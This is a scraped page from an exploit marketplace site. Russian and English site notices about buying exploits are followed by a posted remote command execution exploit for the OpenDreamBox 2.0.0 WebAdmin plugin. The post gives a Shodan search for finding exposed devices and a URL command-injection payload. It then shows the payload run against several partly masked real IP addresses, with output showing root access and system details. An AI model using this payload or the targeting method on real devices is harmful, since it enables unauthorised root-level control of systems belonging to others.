0day.today - наибольшая база данных эксплоитов в мире.
Некоторые вещи, о которых стоит знать:
Мы используем один основной домен 0day.today
Если Вы желаете приобрести эксплоит или заплатить за услуги - Вам необходимо приобрести Золото (Gold). Мы не хотим чтобы Вы использовали наш сайт как инструмент для взломов, поэтому любые действия, которые могут незаконно влиять на других пользователей или на сайты, к которым у Вас нет прав доступа будут запрещены и Ваш профиль со всей вложенной информацией будет уничтожен.
Администрация сайта использует официальные контакты. Опасайтесь обманщиков!
Мы используем один основной домен 0day.today
Если Вы желаете приобрести эксплоит или заплатить за услуги - Вам необходимо приобрести Золото (Gold). Мы не хотим чтобы Вы использовали наш сайт как инструмент для взломов, поэтому любые действия, которые могут незаконно влиять на других пользователей или на сайты, к которым у Вас нет прав доступа будут запрещены и Ваш профиль со всей вложенной информацией будет уничтожен.
Администрация сайта использует официальные контакты. Опасайтесь обманщиков!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Прочитайте [ соглашение ]
- Прочитайте [ Отправить ] правила
- Посетите страницу [ faq ] page
- [ Зарегистрируйте ] профиль
- Получите [ Gold ]
- Если Вы хотите [ продать ]
- Если Вы хотите [ купить ]
- Если Вы потеряли [ Счет ]
- Любые вопросы [ [email protected] ]
- Страница авторизации
- Страница регистрации
- Страница восстановления
- Страница FAQ
- Страница контактов
- Правила публикации
- Страница с соглашением
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Вы можете связаться с нами по:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
OpenDreamBox 2.0.0 Plugin WebAdmin - Remote Code Execution Vulnerability
Автор
Риск
[
Security Risk Critical
]0day-ID
Категория
Дата добавления
Платформа
# Exploit Title: OpenDreamBox 2.0.0 - Plugin WebAdmin RCE # Shodan Dork: "DreamBox" 200 ok" # Date: 07/03/17 # Exploit Author: Jonatas Fil # Vendor Homepage: https://www.dreamboxupdate.com # Software Link: https://www.dreamboxupdate.com/opendreambox/2.0.0 # Version: 2.0.0 Vulnerabilty: Remote Command Execution via Command injection in Plugin WebAdmin. Tools: https://github.com/ninj4c0d3r/ShodanCli ---------------------------------------------------------------------------------------------------- p0c: - First, Search in Shodan: "DreamBox" 200 ok. (https://github.com/ninj4c0d3r/ShodanCli - My tool for search (need api) or https://www.shodan.io) - After, open the target and go to "Extra", wait a moment... - In plugins, if WebAdmin Plugin is installed [VULNERABLE]: Exploit : http://target.com:100000/webadmin/script?command=|YOUR_COMMAND ----------------------------------------------------------------------------------------------------- Examples: http://212.13.x.129:8081/webadmin/script?command=|uname -a : Linux dm7020hd 3.2-dm7020hd #1 SMP Sun Jun 21 15:26:04 CEST 2015 mips GNU/Linux http://80.x.24.154:8880/webadmin/script?command=|id : uid=0(root) gid=0(root) http://62.224.234.x:8081/webadmin/script?command=|pwd : /home/root http://x.19.12.146:10000/webadmin/script?command=|cat /etc/issue : opendreambox 2.0.0 \n \l # 0day.today [2024-06-28] #